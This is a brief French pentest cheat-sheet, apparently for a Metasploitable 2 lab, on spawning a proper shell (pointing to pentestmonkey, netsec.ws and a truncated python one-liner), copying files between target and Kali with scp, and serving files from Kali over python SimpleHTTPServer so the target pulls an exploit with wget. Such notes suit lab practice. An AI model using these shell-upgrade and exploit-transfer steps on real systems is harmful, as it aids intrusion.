* spawn un shell propre -> pentest monkey -> netsec.ws -> python -c "import ..." * copy cible <-> kali * scp * python -> kali : python -m SimpleHTTPServer 8080 -> MS2 : wget http://...:8080/exploit.txt